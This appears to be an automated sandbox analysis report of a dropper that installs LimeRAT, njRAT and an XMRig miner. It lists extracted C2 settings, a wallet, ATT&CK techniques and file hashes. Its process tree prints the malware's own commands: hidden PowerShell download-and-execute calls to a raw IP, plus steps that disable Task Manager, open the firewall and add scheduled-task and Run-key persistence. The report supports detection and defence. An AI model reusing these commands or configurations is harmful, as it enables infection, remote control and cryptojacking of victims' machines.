limerat | a045c1cc2b85a5106a89a970262a3ba07dc65d96573401f1f31b4f9867ba7130

Analysis

max time kernel
150s
max time network
152s
platform
windows10_x64
resource
win10v20210410
submitted
18-04-2021 15:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

98d5dd6c09fa093e791e3c18a9526859.exe
Size

307KB
MD5

98d5dd6c09fa093e791e3c18a9526859
SHA1

758dbd528a61ac56767fab89600c1656d20693bd
SHA256

a045c1cc2b85a5106a89a970262a3ba07dc65d96573401f1f31b4f9867ba7130
SHA512

bc4c4875694b7f6d9e01712a6b9e86352bd1350acb4357031c4a688af9b942835cb52e36ff35ffef3f639eb6fd372c8deb8aa0bb48aadf0ed4b376aa1035882a

Score

10^/10

limerat njrat xmrig =========6.10==========evasion miner persistence rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://34.126.93.163/xm/win.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://34.126.93.163/xm/64a1.com

Extracted

Family

njrat

Version

0.7d

Botnet

=========6.10==========

niogem117.soon.it:11061

Mutex

af9ce263479113682e318a01223de94a

Attributes

reg_key
af9ce263479113682e318a01223de94a
splitter
|'|'|

Extracted

Family

limerat

Wallets

38ZggxKrjJSn9XmS8sM1iTQhX3K6ny5u6E

Attributes

aes_key
beodz
antivm
false
c2_url
https://pastebin.com/raw/nEZ87Pwx
delay
3
download_payload
false
install
true
install_name
svchost.exe
main_folder
AppData
pin_spread
true
sub_folder
\MicrosoftData\
usb_spread
false

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
C:\Windows (x86)\explorer.exe	xmrig

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Microsoft Manager = "C:\\Windows (x86)\\explorer.exe"	explorer.exe

Blocklisted process makes network request 5 IoCs

Processes:

WScript.exeWScript.exepowershell.exepowershell.exe

flow pid process

16 1264 WScript.exe
21 640 WScript.exe
22 3856 powershell.exe
24 1008 powershell.exe
117 640 WScript.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

svchost.execsrss.exesvchost.exesvchost.exewin.com64a1.comexplorer.exe

pid process

1204 svchost.exe
1556 csrss.exe
1940 svchost.exe
2184 svchost.exe
1556 win.com
3944 64a1.com
4148 explorer.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

flow	pid	process
16	1264	WScript.exe
21	640	WScript.exe
22	3856	powershell.exe
24	1008	powershell.exe
117	640	WScript.exe

pid	process
1204	svchost.exe
1556	csrss.exe
1940	svchost.exe
2184	svchost.exe
1556	win.com
3944	64a1.com
4148	explorer.exe

Drops startup file 4 IoCs

Processes:

WScript.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helps.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helps.vbs	WScript.exe

Adds Run key to start application 2 TTPs 18 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

WScript.exeWScript.exeWScript.exeWScript.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\helps = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\helps.vbs\""	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\z = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\z.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\z = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\z.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\af9ce263479113682e318a01223de94a = "\"C:\\ProgramData\\svchost.exe\" .."	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\z = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\z.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\z = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\z.vbs\""	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\helps = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\helps.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\helps = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\helps.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\helps = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\helps.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\af9ce263479113682e318a01223de94a = "\"C:\\ProgramData\\svchost.exe\" .."	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3424 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3336 taskkill.exe

pid	process
3424	schtasks.exe

pid	process
3336	taskkill.exe

Modifies registry class 5 IoCs

Processes:

98d5dd6c09fa093e791e3c18a9526859.execmd.execmd.exeWScript.exeWScript.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	98d5dd6c09fa093e791e3c18a9526859.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	WScript.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3508 reg.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

3296 PING.EXE
512 PING.EXE
340 PING.EXE
3804 PING.EXE

pid	process
3508	reg.exe

pid	process
3296	PING.EXE
512	PING.EXE
340	PING.EXE
3804	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeexplorer.exe

pid	process
3856	powershell.exe
3856	powershell.exe
3856	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe
4148	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exetaskkill.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1668	WMIC.exe
Token: SeSecurityPrivilege	1668	WMIC.exe
Token: SeTakeOwnershipPrivilege	1668	WMIC.exe
Token: SeLoadDriverPrivilege	1668	WMIC.exe
Token: SeSystemProfilePrivilege	1668	WMIC.exe
Token: SeSystemtimePrivilege	1668	WMIC.exe
Token: SeProfSingleProcessPrivilege	1668	WMIC.exe
Token: SeIncBasePriorityPrivilege	1668	WMIC.exe
Token: SeCreatePagefilePrivilege	1668	WMIC.exe
Token: SeBackupPrivilege	1668	WMIC.exe
Token: SeRestorePrivilege	1668	WMIC.exe
Token: SeShutdownPrivilege	1668	WMIC.exe
Token: SeDebugPrivilege	1668	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1668	WMIC.exe
Token: SeRemoteShutdownPrivilege	1668	WMIC.exe
Token: SeUndockPrivilege	1668	WMIC.exe
Token: SeManageVolumePrivilege	1668	WMIC.exe
Token: 33	1668	WMIC.exe
Token: 34	1668	WMIC.exe
Token: 35	1668	WMIC.exe
Token: 36	1668	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1668	WMIC.exe
Token: SeSecurityPrivilege	1668	WMIC.exe
Token: SeTakeOwnershipPrivilege	1668	WMIC.exe
Token: SeLoadDriverPrivilege	1668	WMIC.exe
Token: SeSystemProfilePrivilege	1668	WMIC.exe
Token: SeSystemtimePrivilege	1668	WMIC.exe
Token: SeProfSingleProcessPrivilege	1668	WMIC.exe
Token: SeIncBasePriorityPrivilege	1668	WMIC.exe
Token: SeCreatePagefilePrivilege	1668	WMIC.exe
Token: SeBackupPrivilege	1668	WMIC.exe
Token: SeRestorePrivilege	1668	WMIC.exe
Token: SeShutdownPrivilege	1668	WMIC.exe
Token: SeDebugPrivilege	1668	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1668	WMIC.exe
Token: SeRemoteShutdownPrivilege	1668	WMIC.exe
Token: SeUndockPrivilege	1668	WMIC.exe
Token: SeManageVolumePrivilege	1668	WMIC.exe
Token: 33	1668	WMIC.exe
Token: 34	1668	WMIC.exe
Token: 35	1668	WMIC.exe
Token: 36	1668	WMIC.exe
Token: SeDebugPrivilege	3336	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3368	WMIC.exe
Token: SeSecurityPrivilege	3368	WMIC.exe
Token: SeTakeOwnershipPrivilege	3368	WMIC.exe
Token: SeLoadDriverPrivilege	3368	WMIC.exe
Token: SeSystemProfilePrivilege	3368	WMIC.exe
Token: SeSystemtimePrivilege	3368	WMIC.exe
Token: SeProfSingleProcessPrivilege	3368	WMIC.exe
Token: SeIncBasePriorityPrivilege	3368	WMIC.exe
Token: SeCreatePagefilePrivilege	3368	WMIC.exe
Token: SeBackupPrivilege	3368	WMIC.exe
Token: SeRestorePrivilege	3368	WMIC.exe
Token: SeShutdownPrivilege	3368	WMIC.exe
Token: SeDebugPrivilege	3368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3368	WMIC.exe
Token: SeRemoteShutdownPrivilege	3368	WMIC.exe
Token: SeUndockPrivilege	3368	WMIC.exe
Token: SeManageVolumePrivilege	3368	WMIC.exe
Token: 33	3368	WMIC.exe
Token: 34	3368	WMIC.exe
Token: 35	3368	WMIC.exe
Token: 36	3368	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

98d5dd6c09fa093e791e3c18a9526859.exeWScript.execmd.exeWScript.execmd.exepowershell.exeWScript.exeWScript.execmd.exe

description	pid	process	target process
PID 512 wrote to memory of 208	512	98d5dd6c09fa093e791e3c18a9526859.exe	WScript.exe
PID 512 wrote to memory of 208	512	98d5dd6c09fa093e791e3c18a9526859.exe	WScript.exe
PID 512 wrote to memory of 208	512	98d5dd6c09fa093e791e3c18a9526859.exe	WScript.exe
PID 208 wrote to memory of 852	208	WScript.exe	cmd.exe
PID 208 wrote to memory of 852	208	WScript.exe	cmd.exe
PID 208 wrote to memory of 852	208	WScript.exe	cmd.exe
PID 852 wrote to memory of 1668	852	cmd.exe	WMIC.exe
PID 852 wrote to memory of 1668	852	cmd.exe	WMIC.exe
PID 852 wrote to memory of 1668	852	cmd.exe	WMIC.exe
PID 852 wrote to memory of 3336	852	cmd.exe	taskkill.exe
PID 852 wrote to memory of 3336	852	cmd.exe	taskkill.exe
PID 852 wrote to memory of 3336	852	cmd.exe	taskkill.exe
PID 852 wrote to memory of 3368	852	cmd.exe	WMIC.exe
PID 852 wrote to memory of 3368	852	cmd.exe	WMIC.exe
PID 852 wrote to memory of 3368	852	cmd.exe	WMIC.exe
PID 852 wrote to memory of 3296	852	cmd.exe	PING.EXE
PID 852 wrote to memory of 3296	852	cmd.exe	PING.EXE
PID 852 wrote to memory of 3296	852	cmd.exe	PING.EXE
PID 852 wrote to memory of 2636	852	cmd.exe	WScript.exe
PID 852 wrote to memory of 2636	852	cmd.exe	WScript.exe
PID 852 wrote to memory of 2636	852	cmd.exe	WScript.exe
PID 852 wrote to memory of 512	852	cmd.exe	PING.EXE
PID 852 wrote to memory of 512	852	cmd.exe	PING.EXE
PID 852 wrote to memory of 512	852	cmd.exe	PING.EXE
PID 2636 wrote to memory of 1664	2636	WScript.exe	cmd.exe
PID 2636 wrote to memory of 1664	2636	WScript.exe	cmd.exe
PID 2636 wrote to memory of 1664	2636	WScript.exe	cmd.exe
PID 1664 wrote to memory of 2528	1664	cmd.exe	WMIC.exe
PID 1664 wrote to memory of 2528	1664	cmd.exe	WMIC.exe
PID 1664 wrote to memory of 2528	1664	cmd.exe	WMIC.exe
PID 1664 wrote to memory of 1012	1664	cmd.exe	WMIC.exe
PID 1664 wrote to memory of 1012	1664	cmd.exe	WMIC.exe
PID 1664 wrote to memory of 1012	1664	cmd.exe	WMIC.exe
PID 1664 wrote to memory of 3504	1664	cmd.exe	WMIC.exe
PID 1664 wrote to memory of 3504	1664	cmd.exe	WMIC.exe
PID 1664 wrote to memory of 3504	1664	cmd.exe	WMIC.exe
PID 1664 wrote to memory of 3508	1664	cmd.exe	reg.exe
PID 1664 wrote to memory of 3508	1664	cmd.exe	reg.exe
PID 1664 wrote to memory of 3508	1664	cmd.exe	reg.exe
PID 1664 wrote to memory of 340	1664	cmd.exe	PING.EXE
PID 1664 wrote to memory of 340	1664	cmd.exe	PING.EXE
PID 1664 wrote to memory of 340	1664	cmd.exe	PING.EXE
PID 852 wrote to memory of 4060	852	cmd.exe	cmd.exe
PID 852 wrote to memory of 4060	852	cmd.exe	cmd.exe
PID 852 wrote to memory of 4060	852	cmd.exe	cmd.exe
PID 1664 wrote to memory of 3856	1664	cmd.exe	WScript.exe
PID 1664 wrote to memory of 3856	1664	cmd.exe	WScript.exe
PID 1664 wrote to memory of 3856	1664	cmd.exe	WScript.exe
PID 1664 wrote to memory of 2528	1664	cmd.exe	WScript.exe
PID 1664 wrote to memory of 2528	1664	cmd.exe	WScript.exe
PID 1664 wrote to memory of 2528	1664	cmd.exe	WScript.exe
PID 1664 wrote to memory of 3368	1664	cmd.exe	WScript.exe
PID 1664 wrote to memory of 3368	1664	cmd.exe	WScript.exe
PID 1664 wrote to memory of 3368	1664	cmd.exe	WScript.exe
PID 3856 wrote to memory of 1932	3856	powershell.exe	cmd.exe
PID 3856 wrote to memory of 1932	3856	powershell.exe	cmd.exe
PID 3856 wrote to memory of 1932	3856	powershell.exe	cmd.exe
PID 2528 wrote to memory of 640	2528	WScript.exe	WScript.exe
PID 2528 wrote to memory of 640	2528	WScript.exe	WScript.exe
PID 2528 wrote to memory of 640	2528	WScript.exe	WScript.exe
PID 3368 wrote to memory of 1264	3368	WScript.exe	WScript.exe
PID 3368 wrote to memory of 1264	3368	WScript.exe	WScript.exe
PID 3368 wrote to memory of 1264	3368	WScript.exe	WScript.exe
PID 1932 wrote to memory of 1204	1932	cmd.exe	svchost.exe

C:\Users\Admin\AppData\Local\Temp\98d5dd6c09fa093e791e3c18a9526859.exe
"C:\Users\Admin\AppData\Local\Temp\98d5dd6c09fa093e791e3c18a9526859.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:512

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\updateW\java.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.bat" "
3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:852

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM xmrig.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where name='xmrig.exe' delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3368

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
4⤵
- Runs ping.exe
PID:3296

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\updateW\upd3.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:2636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\updateW\1234.bat" "
5⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete
6⤵
PID:2528

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where name='Taskmgr.exe' delete
6⤵
PID:1012

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
6⤵
PID:3504

C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
6⤵
- Modifies registry key
PID:3508

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
6⤵
- Runs ping.exe
PID:340

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\updateW\1a2.vbs"
6⤵
PID:3856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\updateW\64a1.bat" "
7⤵
- Suspicious use of WriteProcessMemory
PID:1932

C:\Users\Admin\AppData\Local\Temp\updateW\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\updateW\svchost.exe"
8⤵
- Executes dropped EXE
PID:1204

C:\ProgramData\svchost.exe
"C:\ProgramData\svchost.exe"
9⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2184

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE
10⤵
PID:804

C:\Users\Admin\AppData\Local\Temp\updateW\csrss.exe
"C:\Users\Admin\AppData\Local\Temp\updateW\csrss.exe"
8⤵
- Executes dropped EXE
PID:1556

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\MicrosoftData\svchost.exe'"
9⤵
- Creates scheduled task(s)
PID:3424

C:\Users\Admin\AppData\Roaming\MicrosoftData\svchost.exe
"C:\Users\Admin\AppData\Roaming\MicrosoftData\svchost.exe"
9⤵
- Executes dropped EXE
PID:1940

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\Admin\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\Admin\AppData\Local\Temp\updateW\win.com'
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3856

C:\Users\Admin\AppData\Local\Temp\updateW\win.com
"C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
9⤵
- Executes dropped EXE
PID:1556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com'
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1008

C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com
"C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
9⤵
- Executes dropped EXE
PID:3944

C:\Windows (x86)\explorer.exe
"C:\Windows (x86)\explorer.exe"
10⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4148

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 90
8⤵
- Runs ping.exe
PID:3804

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\updateW\z.vbs"
6⤵
- Drops startup file
- Adds Run key to start application
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2528

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\z.vbs"
7⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
PID:640

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\updateW\helps.vbs"
6⤵
- Drops startup file
- Adds Run key to start application
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3368

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\helps.vbs"
7⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
PID:1264

C:\Windows\SysWOW64\cmd.exe
cmd /c del "C:\Users\Admin\AppData\Local\Temp\updateW\1234.bat"
6⤵
PID:3712

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
4⤵
- Runs ping.exe
PID:512

C:\Windows\SysWOW64\cmd.exe
cmd /c del "C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.bat"
4⤵
PID:4060

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\svchost.exe
MD5
83b3cc9e10d4604055a58276c012638d

SHA1
95eeb2d6c67f6d0685838a8b8707e5122171a40c

SHA256
6a91baa1459c79c3a84073bd204a4cb2b863a3fa2835e0a37affb71c0166ca2f

SHA512
5f6f8a9e1650383914fadb7d6f5da69e242ff56c71caf070de493a6ce454fa9d83b799d816cbb864280995733b7de624f436052f323ff5cbf823e42a69d840a0

Download Submit
C:\ProgramData\svchost.exe
MD5
83b3cc9e10d4604055a58276c012638d

SHA1
95eeb2d6c67f6d0685838a8b8707e5122171a40c

SHA256
6a91baa1459c79c3a84073bd204a4cb2b863a3fa2835e0a37affb71c0166ca2f

SHA512
5f6f8a9e1650383914fadb7d6f5da69e242ff56c71caf070de493a6ce454fa9d83b799d816cbb864280995733b7de624f436052f323ff5cbf823e42a69d840a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\svchost.exe.log
MD5
9424b451803882d2fc76f5ef5c124991

SHA1
72132bc89bcf174fd4a40cfb99b309a365c8e4db

SHA256
2f7b91d8a056e89152222115fe01e54dfb3c925096efba7847a069f5d582405a

SHA512
9843c3ea376d72b7641ab7e583e88a1188e36aca6ada3a6912c6e44066bc49db673a692334a14e08bb42e7da3e2719d4decd1bc3effba928c108e1cc25c22fae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
b751492c41c6f3173d3b6f31c1b9b4eb

SHA1
abc53a2c939b1d774940deb0b888b7b1ba5a3c7b

SHA256
ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457

SHA512
afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
adf88049e7feec865d4d617397922b66

SHA1
06253b5f108dfb7730e8cb86f4a1e989368281ae

SHA256
2759863fd5c7adcce9089176fa9a028c8b93b79b4e313db86a3eec1062dbc790

SHA512
3c785413e3a3e6be6430b2a63bd7d9a00edb3d65742921005d7d2b60f8dee42bfe85462e118e39eb67aa645b6ef7feffffb4932f454ac269d5bb793f3301f934

Download Submit
C:\Users\Admin\AppData\Local\Temp\helps.vbs
MD5
08769eb104652ab8af30a9506037bf20

SHA1
bd58e7172202c4c94bd6f0a86b6d9dabcc55a84a

SHA256
7421f0a8105bdc75e0880ccf48ad7e0e109defa229cc3f156c64a5ac252fcda7

SHA512
6ef40302d81437e83fcfbdf944bd32b2e49067c8f4c65b1d525e50692140bb2bb68f3431e205d08999bf127497769bf49abc70de8844c4ab4b61bc07d18498f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\1234.bat
MD5
fa59c39ff45d0d3faaf146e9de471efa

SHA1
400f823a5f30e7b38d91c60ae854627ea770fb9e

SHA256
6097c2cb55b329514981f92c8eaa27b5d48328bf2c87e34c4f395303f38fd777

SHA512
77ecf000c8d5ece053734c0d8eb33618eb3f338083dedc7077d0d60d36905662a809de53504aea0b846e955f17e3141d1652599aaa70f222c7dca0372fbc2b97

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\1a1.vbs
MD5
5ab24a6b616a22dfaa3cfd79b6dd2ba4

SHA1
fe83bfa0daf896b7f9a1fd8e94b4469d7ee1a275

SHA256
5e4baf392c30674f45da626e9f92677c6840ec1d2246b17839df760ab123b933

SHA512
4c3dab4c99f0e1a93550b23296e6b6f7fa27fa3a953f4dae36868f8905a6fe75c8562bb522af4e931eb7b7a15b850b2231d0c21b3a1caa738af24f4d283eada4

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\1a2.vbs
MD5
20553064c23041f39f004c98ed7af89b

SHA1
683956f3cf43eb8a37d12d8480a09e4fdb36bc21

SHA256
39322bd957d630b8e2d365920028a0a467194ef6ca7d63688a14b95468eea730

SHA512
22d45545b3eb7bb288a3ae51414162b959c1016c283de8899f5b78e1673bc31fccc660606daa021b1f80385d40f914cd8c33a9c129260a25fa923148fdf1418e

Download Submit
C:\Users\Admin\AppData\Local\Temp\updateW\32a1.bat
MD5
813fd324da9cea4b1ea7fb1de4a0c72b

SHA1
b7971466c6797935e61d3f1852009523f339ea51

SHA256
